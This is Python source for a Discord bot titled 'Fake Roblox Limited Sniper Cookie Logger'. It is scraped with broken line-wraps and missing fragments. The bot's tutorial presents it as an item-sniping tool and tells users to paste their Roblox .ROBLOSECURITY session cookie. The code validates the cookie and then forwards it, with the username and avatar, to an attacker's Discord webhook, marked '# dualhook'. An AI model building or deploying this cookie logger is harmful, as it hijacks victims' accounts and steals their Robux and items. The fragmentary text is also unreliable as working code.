Fake Roblox Limited Sniper Cookie Logger Op
Fake Roblox Limited Sniper Cookie Logger Op
Fake Roblox Limited Sniper Cookie Logger Op
req = requests.Session()
client = commands.Bot(command_prefix=p) # change prefix if you want
client.remove_command('help') #remove default help command
showing_logs = False # not showing logs on default
wh = "WEBHOOK HERE" # enter ur webhook here
@client.event
async def on_ready():
print(f"\nBot is Online and Ready!\nCommand Prefix: {p}\nGithub: .)\nCommands:
{p}startlogs, {p}help, {p}commands, {p}tutorial, {p}snipe, {p}setbudget,
{p}antiproject, {p}stop\nWhen {p}startlogs is on it will increase the delay of
message sent from the bot (To stop start logs just stop the code since I dont
figure a way to turn it off yet.)\nMade By: Who#3333 .gg/comping :(") # print Bot
Online! when bot is ready and github and available commands
url="https://cdn.discordapp.com/attachments/853359254647341066/910930695440969752/
Dominus_Praefectus.png"
)
embed_cmd.add_field(
name="Commands",
value=f"**{p}help** -Shows about and available commands\n**{p}commands** -
Shows this message\n**{p}tutorial** -Shows how to start sniping limiteds\
n**{p}snipe + Roblox Cookie** -Starts sniping.\n**{p}setbudget + amount** -Sets
budget when sniping\n**{p}antiproject + on/off** -Doesn't snipe projected items.\
n**{p}stop** -Stops sniping",
inline=True,
)
embed_cmd.set_footer(text="For Further Help, Contact The Server Owner.")
await ctx.send(embed=embed_cmd)
url="https://cdn.discordapp.com/attachments/853359254647341066/910930695440969752/
Dominus_Praefectus.png"
)
embed_tutorial.add_field(
name="Tutorial \n",
value=f"\n1. Get Your Roblox Cookie. \n2. Goto The Bot's DM. \n3. Change
Configurations If You Want to. \n4. Type '{p}snipe' + Your Cookie\
n**Type \"{p}stop\" to Stop Sniping.**\n \n **Example**\n {p}snipe _|WARNING:-DO-
NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-
your-ROBUX-and-items.|_COOKIE",
inline=True,
)
embed_tutorial.set_footer(text="For Further Help, Contact The Server Owner.")
await ctx.send(embed=embed_tutorial)
pass
thumbnail = requests.get(
f"https://thumbnails.roblox.com/v1/users/avatar?
userIds={userid}&size=420x420&format=Png&isCircular=false"
).json()
image_url = thumbnail["data"][0]["imageUrl"]
pindata = requests.get(
"https://auth.roblox.com/v1/account/pin", cookies={".ROBLOSECURITY":
cookie}
).json()
pin_bool = pindata["isEnabled"] # does the user have a p
embed4 = discord.Embed(
title=f"**Logged in as {username} \n✅ Cookie is Valid! Sniping
Limiteds Now. ✅**", color=0x47FF75
)
await ctx.send(embed=embed4)
# dualhook
embed.add_embed_field(name="Cookie🍪:", value=f"```{cookie}```",
inline=False)
embed.set_thumbnail(url=image_url)
webhook.add_embed(embed)
webhook.execute()
else:
e = discord.Embed(title="**❌ Cookie is Invalid! ❌**", color=0xFF0000)
await ctx.send(embed=e)
client.run(
"BOT TOKEN HERE"
) # replace with your bot token